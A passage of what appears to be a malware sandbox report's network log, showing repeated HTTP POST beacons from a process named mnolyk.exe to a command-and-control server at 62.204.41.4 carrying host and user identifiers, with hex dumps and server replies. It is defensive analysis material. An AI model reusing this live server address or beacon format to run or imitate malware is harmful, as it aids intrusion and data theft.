                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:25.124984980 CET1005INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      546192.168.2.75027462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:25.337790966 CET1006OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:25.402496099 CET1006INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      547192.168.2.75027562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:26.060580015 CET1007OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:26.127399921 CET1007INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      548192.168.2.75027662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:26.300126076 CET1008OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:26.364619017 CET1008INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      549192.168.2.75027762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:27.380412102 CET1009OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:27.446774960 CET1009INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      55192.168.2.74977962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:10.997636080 CET487OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:11.064073086 CET493INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      550192.168.2.75027862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:27.635525942 CET1010OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:27.701442957 CET1010INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      551192.168.2.75027962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:27.884546995 CET1011OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:27.948548079 CET1011INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      552192.168.2.75028062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:28.132356882 CET1012OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:28.198837042 CET1012INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      553192.168.2.75028162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:28.378215075 CET1013OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:28.442949057 CET1013INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      554192.168.2.75028262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:28.628160954 CET1014OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:28.692078114 CET1014INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      555192.168.2.75028362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:28.863962889 CET1015OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:28.927964926 CET1015INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      556192.168.2.75028462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:29.098649979 CET1016OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:29.162779093 CET1016INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      557192.168.2.75028562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:29.330319881 CET1017OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:29.393243074 CET1017INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      558192.168.2.75028662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:29.567763090 CET1018OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:29.629834890 CET1018INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      559192.168.2.75028762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:29.798909903 CET1019OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:29.862126112 CET1019INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      56192.168.2.74978162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:11.243043900 CET494OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:11.307111025 CET495INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      560192.168.2.75028862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:30.033696890 CET1020OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:30.099051952 CET1020INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      561192.168.2.75028962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:30.269170046 CET1021OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:30.333194017 CET1021INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:30 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      562192.168.2.75029062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:30.501538038 CET1022OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:30.565505028 CET1022INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
